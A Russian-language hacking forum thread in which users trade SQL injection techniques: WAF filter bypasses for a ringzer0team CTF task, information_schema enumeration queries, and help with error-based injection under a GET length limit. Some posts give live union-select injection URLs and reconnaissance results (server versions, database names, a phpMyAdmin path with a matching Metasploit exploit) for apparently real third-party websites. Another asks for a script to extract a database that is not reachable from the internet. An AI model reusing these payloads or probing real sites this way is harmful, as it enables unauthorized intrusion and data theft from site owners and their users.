да и как не злиться на людей который выкладывают дамп ачата на ачате? по врапперам кстати неплохая шпаргалка https://www.ptsecurity.com/ru-ru/ics/А.Москвин_О_безоп_исп_РНР_wrappers.pdf сорцы не смотрел в итоге? там забавный мускул пользователь с такими грантами что можно поменять хэш рутового мускул пользователя
подкиньте мысль, boolen-based скуль, waf фильтрует "union" ")" "/" "=" какие могут быть варианты запросов? = можно обойти оператором "like", / в общем то не особо и нужен, за union я уже смирился, но вот чертова закрывающая скобка -_- ( именно waf, потому что в хедерах есть статус Waf-Capulta: Passed/Blocked ) даблурлэнкод пробовал post/get waf обрабатывает, через cookie данные не уходят потыкать можно тут ringzer0team.com ( sqlj последний таск "Internet As A Service" ) ------------------------- что удалось узнать, все эти запросы как то связаны со https://ringzer0team.slack.com ( то есть с slack.com ) правда при чем тут мускул не понятно, не одного нормального примера кода в интернетах не нашел в запросе присутствуют поля url,title,description некоторые параметры бд storage_engine = InnoDB hostname = lxc26-sql-search version = 5.5.50-0ubuntu0.14.04.1 sql_mode = NULL datadir = /var/lib/mysql в корне сайт два бесполезных файла /files/test.txt /files/useless.txt
если в mysql select schema_name from information_schema.schemata limit 0,1 - выводит названия бд далее limit 1,1 ; limit 2,1 и т д select table_name from information_schema.tables where table_schema='название бд которую вывел в пред запросе' или если не выводит в hex select table_name from information_schema.tables where table_schema=0x002..... https://forum.antichat.ru/threads/43966/
Подскажите как забрать базу sql если к ней нет доступа из инета? Мож скриптик какой есть? Provider=SQLOLEDB.1 Data Source=.\SQLEXPRESS
Можно прочитать даныи фаил через скулю?прочитать? http://icfi.ulim.md/blocks/db.php http://icfi.ulim.md/alltopics.php?cat=3+union+select+1,2,3,4,5,6,7,8,9+--+
нет прочитать нельзя. Code: Web Server: Apache/2.2.22 (Ubuntu) Powered-by: PHP/5.3.10-1ubuntu3.18 Current DB: icfi Data Bases: information_schema icfi test http://icfi.ulim.md/phpmyadmin/ http://icfi.ulim.md/phpmyadmin/Documentation.html phpMyAdmin 3.4.10.1 phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)
Столкнулся с небольшой проблемой при эксплуатации error-based инъекции. GET запрос лимитирован до 255 символов. Все доступные вектора больше этого лимита (короткие типа extractvalue, updatexml, bigint overflow - не работают). Подскажите пути решения проблемы.
http://www.vitrinesvesoul.fr/annuai...CHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'1'='1 через юнион не выводится http://www.vitrinesvesoul.fr/annuaire.php?cat=5'+union+select+1,2,3,4,5,6,7,8--+ полей 8 вывода не нашел
Программно это через error вектор в несколько десятков потоков? Нужно учиться самому, так больше пользы будет и эффекта в поисках уязвимостей, и не всегда программа может пройти там, где сможете пройти вы!